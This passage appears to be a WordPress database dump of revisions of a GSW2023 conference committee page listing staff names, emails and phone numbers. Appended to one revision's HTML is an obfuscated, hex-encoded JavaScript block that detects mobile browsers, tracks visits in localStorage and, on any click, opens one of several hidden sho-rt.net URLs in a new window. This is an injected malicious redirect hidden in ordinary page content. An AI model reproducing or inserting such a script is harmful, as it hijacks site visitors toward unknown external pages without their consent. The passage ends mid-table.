width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1 alignnone wp-image-5159\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/dr-radwa-267x300.jpg\" alt=\"\" width=\"133\" height=\"150\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><strong>IT Affairs</strong></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Research Eng. Ayman Elzagh</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Web Director\r\nGSW2023, Egypt\r\n<span style=\"font-size: 11pt;\"><a href=\"mailto:ayzagh@aast.edu\">ayzagh@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201210007979\">+201210007979</a></span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/09/IMG-20230905-WA0015.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Mohamed ElQurashi</strong></em></span>\r\n<span style=\"font-size: 12pt;\">m.elqurashi@gmail.com</span>\r\n<span style=\"font-size: 12pt;\">+201003348433</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Security Engineer</span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong>\r\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span>\r\nDirector of Events and conferences Department\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>yasserelrashidi@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201270059999</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span>\r\nLocal financial Director, GSW2023, Egypt\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>mohamed_abdallah20102002@yahoo.com</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201141401861</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-09-06 06:10:51','2023-09-06 06:10:51','',4849,'https://gsw2023.com/?p=5463',0,'revision','',0),
(5464,1,'2023-09-06 06:12:29','2023-09-06 06:12:29','[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\r\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\r\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1 alignnone wp-image-5160\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/zaki-212x300.jpg\" alt=\"\" width=\"106\" height=\"150\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1 alignnone wp-image-5159\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/dr-radwa-267x300.jpg\" alt=\"\" width=\"133\" height=\"150\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><strong>IT Affairs</strong></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Research Eng. Ayman Elzagh</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Web Director\r\nGSW2023, Egypt\r\n<span style=\"font-size: 11pt;\"><a href=\"mailto:ayzagh@aast.edu\">ayzagh@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201210007979\">+201210007979</a></span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/09/IMG-20230905-WA0015.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Mohamed ElQurashi</strong></em></span>\r\n<span style=\"font-size: 12pt;\">m.elqurashi@gmail.com</span>\r\n<span style=\"font-size: 12pt;\">+201003348433</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 